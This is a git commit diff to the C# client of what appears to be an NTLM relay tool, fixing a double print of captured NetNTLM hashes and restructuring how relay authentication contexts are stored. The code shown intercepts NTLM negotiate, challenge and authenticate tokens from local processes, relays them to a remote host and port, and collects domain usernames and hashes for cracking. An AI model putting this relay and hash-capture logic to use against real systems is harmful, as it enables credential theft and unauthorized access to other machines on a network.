Fixed double print of NetNTLM hashes. Fixed warning messages for missing relay context

CCob · CCob · commit abdbbd3e823b · 2021-11-16T12:33:05.000Z
diff --git a/client/Program.cs b/client/Program.cs
@@ -194,18 +194,23 @@ static BitseryObject ProcessRelayRequest(RelayRequest relayRequest) {
             var token = NtlmAuthenticationToken.Parse(relayRequest.Token);
             BitseryObject lsaResponse;
             bool doPassive = DoPassiveMode(relayRequest.ProcessID);
+            NtlmAuth authContext;
 
-            if (token is NtlmNegotiateAuthenticationToken) {
-
-                var newAuthContext = new NtlmAuth(relayRequest.Context, !doPassive ? new NtlmRelayChallengeResponse(host, port) : null);             
-                activeContext[newAuthContext.Context] = newAuthContext;
+            if (!activeContext.ContainsKey(relayRequest.Context)){
+                authContext = new NtlmAuth(relayRequest.Context, !doPassive ? new NtlmRelayChallengeResponse(host, port) : null);
+                activeContext[authContext.Context] = authContext;
+            } else {
+                authContext = activeContext[relayRequest.Context];
+            }
 
+            if (token is NtlmNegotiateAuthenticationToken) {
+               
                 if (!doPassive) {
-                    var relayResponse = newAuthContext.Relayer.GetChallengeToken(relayRequest.Token);
+                    var relayResponse = authContext.Relayer.GetChallengeToken(relayRequest.Token);
 
                     if (relayResponse.Length > 0) {
                         lsaResponse = new RelayChallengeResponse(relayResponse);
-                        newAuthContext.Challenge = (NtlmChallengeAuthenticationToken)NtlmAuthenticationToken.Parse(relayResponse);
+                        authContext.Challenge = (NtlmChallengeAuthenticationToken)NtlmAuthenticationToken.Parse(relayResponse);
                     } else {
                         Console.WriteLine($"[!] Failed to relay NTLM Type 1 and get challenge");
                         lsaResponse = new RelayChallengeResponse(RelayStatus.Passive);
@@ -223,15 +228,13 @@ static BitseryObject ProcessRelayRequest(RelayRequest relayRequest) {
 
                 } else {
                    
-                    var authContext = activeContext[relayRequest.Context];
                     activeContext.Remove(relayRequest.Context);
                     authContext.Authentication = ntlmAuthenticate;
                     bool? success = null;
                     string userName = $"{ntlmAuthenticate.Domain}\\{ntlmAuthenticate.UserName}";
 
                     if (!doPassive && !string.IsNullOrEmpty(ntlmAuthenticate.UserName)) {
                         success = authContext.Relayer.SendAuthenticateToken(relayRequest.Token);
-                        PrintNTLMv2(authContext, relayRequest.Process.ProcessName, success);
 
                         UserInfo userInfo = new UserInfo(ntlmAuthenticate.UserName, ntlmAuthenticate.Domain);
 
@@ -258,12 +261,7 @@ static BitseryObject ProcessRelayRequest(RelayRequest relayRequest) {
 
             } else if (token is NtlmChallengeAuthenticationToken challengeToken) {
 
-                if (activeContext.ContainsKey(relayRequest.Context)) {
-                    activeContext[relayRequest.Context].Challenge = challengeToken;
-                } else {
-                    Console.WriteLine("[!] Got passive NTLM challenge message without a valid context");
-                }
-
+                authContext.Challenge = challengeToken;
                 lsaResponse = new RelayChallengeResponse(RelayStatus.Passive);
 
             } else {
